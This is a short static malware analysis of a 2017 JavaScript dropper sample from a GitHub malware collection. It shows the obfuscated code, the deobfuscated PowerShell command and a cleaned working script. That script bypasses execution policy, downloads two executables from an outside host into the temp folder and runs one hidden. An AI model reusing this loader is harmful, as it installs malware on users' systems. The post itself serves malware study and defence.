The “javascript-malware-collection” repository on GitHub serves as a repository for various forms of malicious code, each capable of compromising systems and stealing sensitive information.
Within this repository, we can analyze characteristics of JavaScript-based malicious codes, revealing their intricate functionalities and potential impacts.
In this brief static malware analysis, our focus is on examining a specific sample obtained from this repository.
By directly inspecting the source code, we aim to identify and highlight the malicious components present within.
About Malicious Sample
In this static analysis, we’ll examine a sample from January 10, 2017, sourced from the “javascript-malware-collection” repository (to Access from GitHub).
By directly inspecting the code, we aim to identify malicious components, shedding light on their functionality and potential impact.
Cleaning The Code
In this part, we focus on cleaning unnecessary code clutter and consolidating the malicious segments from the sample.
By removing extraneous elements and organizing the code, we aim to gain clarity on its malicious intent and functionality, enhancing our understanding of its behavior and potential impact.
// WScript object
var edeb = WScript;
var cqorobcit = edeb.CreateObject('WScript.Shell');
// Full command
var jqutzo = "cmd.exe /c \"po" + "we" + "rs" + "he" + "ll $ojogo='^dimas.top';$hetfo='^-Scope Pr';$pobbi='^,$path); ';$innypu='^ocess; $p';$monsucm='^y Bypass ';$binkucb='^h';$ykpyffy='^Start-Pro';$ykjygr='^:temp+''\b';$uzmez='^e'');(New-';$xzymo='^Set-Execu';$ulirgo='^tp://laro';$eqtem='^ath=($env';$evyvz='^).Downloa';$ogxow='^Webclient';$utkyjv='^/777.exe''';$gsydibv='^tionPolic';$upoh='^stem.Net.';$zceqmi='^Object Sy';$cepsuhm='^ipbafa.ex';$qfyzko='^dFile(''ht';$awysqe='^cess $pat'; Invoke-Expression ($xzymo+$gsydibv+$monsucm+$hetfo+$innypu+$eqtem+$ykjygr+$cepsuhm+$uzmez+$zceqmi+$upoh+$ogxow+$evyvz+$qfyzko+$ulirgo+$ojogo+$utkyjv+$pobbi+$ykpyffy+$awysqe+$binkucb);\"";
// Execution
cqorobcit[tdurot](jqutzo, ctywo);
Now, instead of examining 475 lines of unnecessary code, we can focus on the malicious part of the script with just 4 lines. Let’s clean the string in ‘jqutzo’ to identify the command.
powershell -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://laro^dimas.top/777.exe','$env:temp\bafa.exe');(New-Object System.Net.WebClient).DownloadFile('http://laro^dimas.top/ipbafa.exe','$env:temp\bafa.exe'); Start-Process $env:temp\bafa.exe"
Here is the PowerShell command. Before explaining the purpose of the malicious script, let’s put the code into its final form.
// WScript object
var script = WScript;
var Ws = script.CreateObject('WScript.Shell');
// PowerShell command
var powershellCommand = "powershell -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient).DownloadFile('http://laro^dimas.top/777.exe','$env:temp\\bafa.exe');(New-Object System.Net.WebClient).DownloadFile('http://laro^dimas.top/ipbafa.exe','$env:temp\\bafa.exe'); Start-Process $env:temp\\bafa.exe\"";
// Execution
Ws["run"](powershellCommand, 0);
Purpose of Malicious Sample
This sophisticated script, adeptly integrating WScript and PowerShell, initiates a sequence of covert operations.
Initially, it discreetly retrieves two files, ‘777.exe’ and ‘ipbafa.exe’, from remote web servers, silently transferring them to the system’s temporary directory.
These files are likely carrying malware payloads. Subsequently, it triggers the execution of ‘bafa.exe’ from the temporary directory.
This process, hidden from the user, may lead to the deployment of harmful software, such as ransomware, spyware, or remote access tools, enabling unauthorized access or control over the compromised system.
Conclusion
In conclusion, this brief analysis exposes the malicious nature of the investigated JavaScript code, sourced from a repository known for harboring JavaScript malwares.
By dissecting its components, we’ve uncovered a sophisticated scheme leveraging WScript to clandestinely download and execute potentially harmful files.